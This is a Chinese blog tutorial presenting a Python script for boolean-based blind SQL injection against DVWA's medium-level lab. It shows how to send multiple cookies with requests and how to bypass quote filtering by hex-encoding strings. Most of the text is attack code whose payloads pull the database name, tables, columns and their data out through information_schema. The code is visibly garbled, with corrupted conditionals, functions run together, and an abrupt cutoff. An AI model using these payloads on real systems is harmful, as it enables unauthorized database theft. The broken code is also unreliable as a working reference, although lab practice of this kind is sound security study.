python实现sql布尔盲注（多个cookie，引号过滤绕过）

本文使用python3的requests模块发送和接收http报文

1、Cookie头包含多个值

单个cookie的情况，cookie可以通过headers参数传入，比如：

import requests

url = "http://192.168.101.16/pikachu/vul/sqli/sqli_blind_b.php"               
headers={ 
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
"Cookie": "PHPSESSID=7qgjcq21lsq834acodn0mo7km3"
}   
 
param = {
"name":"lili",
"submit":"查询",
}
response = requests.get(url, params = param, headers = headers)

多个cookie的情况，再用这种方法就不行了，比如如果把上图代码中headers字典写成

headers={ 
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
"Cookie": "PHPSESSID=7qgjcq21lsq834acodn0mo7km3; seurity=medium"
}  

虽然脚本执行的时候不会报错，但加 print(response.request.headers) 打印之后会发现，request报文头中是不会带入我们设置的cookie的（忘记具体是根本没有Cookie头，还是会自动生成新cookie了＞︿＜）

对于多个cookie的情况，需要用到cookies参数

import requests

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/"               
headers={ 
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",  
    }    
cookies={"security": "medium", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}          #单个cookie的情况可以直接写在headers中，两个cookie的情况要用字典形式的cookies参数

param = {
"id":"1",
"Submit":"Submit",
}
response = requests.post(url, data = param, headers = headers, cookies = cookies)  

2、绕过引号过滤

可以通过把字符串转换为十六进制ascii来绕过引号过滤，需要用到binascii模块。只需要两步就可以把字符串转换为十六进制ascii码

import binascii   
table='USERS'

table = binascii.b2a_hex(table.encode())
table = table.decode('ascii') 

3、完整代码

以dvwa的SQL Injection (Blind)关卡的medium等级为例，该等级过滤了引号，并且dvwa全站都是有至少2个cookie值。

以下代码可以实现本关卡的数据库爆库操作（未经允许不可转载引用，虽然可能也不会有人想转载引用。）

#!/usr/bin/python3
# coding=utf-8

"""
functions for boolean-based sql injection(POST，with Single quotes filtering bypass)

:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests
import binascii

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind/"               #有可利用漏洞的url，根据实际情况填写
headers={ 
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",  
    }    #http request报文头部，根据实际情况填写
cookies={"security": "medium", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}          #单个cookie的情况可以直接写在headers中，两个cookie的情况要用字典形式的cookies参数
 
keylist = [hex(i) for i in range(33, 127)]                                     #十六进制ASCII，包括数字、大小写字母、可见特殊字符
flag = 'User ID exists in the database'                                        #用于判断附加sql语句为真的字符，根据网页回显填写

def CurrentDatabasePOST():
    n = 10                                                                      #预测当前数据库名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j3:
            payload1 = "1 and length(database())>"+str(j)+"-- ss"           #所有payload根据实际情况填写
            param = {
            "id":payload1,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)     #POST方法发送含payload的request
            #print(response.request.body)
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload4 = "1 and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
            param = {
            "id":payload4,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload7 = "1 and (length((select group_concat(column_name) from information_schema.columns where table_name = 0x"+table+")))>"+str(j)+"-- ss"
            param = {
            "id":payload7,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload10 = "1 and (length((select group_concat(concat("+col1+",0x5E,"+col2+")) from "+table+")))>"+str(j)+"-- ss"
            param = {
            "id":payload10,
            "Submit":"Submit",
            }
            response = requests.post(url, data = param, headers = headers, cookies = cookies)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k